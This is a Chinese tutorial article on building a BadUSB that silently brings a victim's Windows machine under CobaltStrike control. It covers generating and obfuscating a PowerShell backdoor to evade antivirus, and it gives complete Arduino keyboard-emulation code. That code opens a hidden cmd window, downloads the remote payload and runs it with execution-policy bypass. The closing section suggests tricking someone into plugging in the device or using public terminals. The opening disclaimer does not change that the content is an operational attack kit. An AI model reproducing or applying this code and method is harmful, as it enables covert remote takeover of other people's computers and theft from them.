推荐安全工具

BadUSB简单免杀一秒上线CobaltStrike

以下文章来源于NearSec ,作者K
本文仅供技术交流,用于违法犯罪与本文无关!一旦发现上报处理!

0x01 简单免杀制作

1.CobaltStrike服务端准备

74280-f6jjg9xrgk.png

启动服务端命令

./teamserver 192.168.1.6 adm1nt1st

2.CobaltStrike客户端登录并导出PS远控
83548-ql2ppaibir.png

输入服务端IP端口密码,用户名随意写

设置监听器

63563-nr6ib7gblpq.png

Payload默认即可,端口尽量别冲突

15003-2vvapvhtfg3.png

选择Payload后门生成

87727-gu57jw0fevl.png

生成PowerShell

71066-xblwf3zgo7a.png

运行保存在桌面的payload.ps1,在杀软全程开启的情况下直接上线(易翻车,运气好)

05175-d5casnqii5.png

3.编码混淆

PowerShell的免杀可以用Invoke-Obfuscation,Invoke-Obfuscation主要是对ps1脚本进行免杀,需要现有一个ps的payload。

进入Invoke-Obfuscation目录后,在PowerShell中执行命令

Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

05104-4r8eb54tlf3.png

遇到权限报错问题可以参照:

https://blog.csdn.net/ebzxw/article/details/85019887

然后执行命令,指定待处理的Ps1文件

set scriptpath c:\xxx\payload.ps1

或者指定待处理的ps代码

set scriptblock 'echo xss'
70467-czoa7dqyj2o.png

输入encoding 并选择编码方式,比如1

38491-2lz7d0gzufi.png

输入命令,导出免杀ps文件到指定路径

out C:\xxx\xxx.ps1
56678-gutrlres7k.png

运行上线,至此,简单免杀制作完成。

46476-7zg287f3pjs.png

4.放到远程服务器备用

20690-sieuu87v5b.png

0x02 BadUsb制作

1.将硬件插入电脑
77578-y4sa6wp51zd.png

2.打开Arduino IDE

工具->板->选择"Arduino Leonardo"
67604-l45n17xmv8.png

端口->选择"COM (Arduino Leonardo)"

77034-6vd2bxdsh9j.png

3.将以下代码粘贴到arduino

void setup() {
  // putpower shell your setup code here, to run once
  Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD  /q /d /f:off /v:on /k MODE con: cols=15 lines=1");  //无回显
//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //有回显
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object system.net.webclient;");
Keyboard.println("$url= 'http://xx.xx.xx.xx/xxx.ps1';");  //远程服务器ps1远控地址
Keyboard.println("$file = 'd:\\xxx.ps1';");      //下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file)");  //采用分段执行绕过防火墙进程防护
Keyboard.println("powershell.exe -executionpolicy bypass -file d:\\xxx.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
}
 
void loop() {
  // put your main code here, to run repeatedly:
 
}

代码大体意思:

插入BadUsb后等待3秒
按下Windows+R
切换大写绕开输入法
模拟输入字符串,最小化打开cmd窗口
隐藏输入特定命令,下载远控并调用powershell执行

4.接下来进行烧录程序

注意右下角,程序写到BadUSB里,别写错地方了,程序不报错证明成功

72488-tsz0zdsify.png

31096-e5gfzy26f3c.png

0x03 上线测试

1.电脑插入BadUSB

会有些许痕迹,大家后续集思广益可以自己改善
47673-djo323n8ohf.png

会有一个很小的cmd窗口,放大里边没任何内容
63787-ypphml8wf2q.png

可以看到更新火绒库后不会报毒

2.打开CobaltStrike,发现已经上线

43655-bj9ry8q7vi.png

0x04 攻击场景

1.社工攻击

小姐姐小姐姐,我的电脑坏了,插不了U盘,你的借我插一下呗

33631-9bz9fr666ie.png

2.带有USB接口的终端机

各场所终端机器,找到USB接口怼进去
86712-k9ifso48egr.png

3.其他应用场景自行脑补

79408-9xr02jhc93k.png

重生信安线上第二期即将开始招生 公众号后台回复“培训”查看详情

本文来自投稿,不代表本站立场,如若转载,请注明出处:http://www.csxxaq.com/sectools/1352.html
QQ和微信号能帮你躺着赚钱?醒醒!
« 上一篇 07-03
横向移动工具WMIHACKER
下一篇 » 07-03

相关推荐

Joomla漏洞总结

以下文章来源于黑白天 ,作者kevinJoomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现漏洞描述Joomla是一套内容管理系统,是使用P...

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...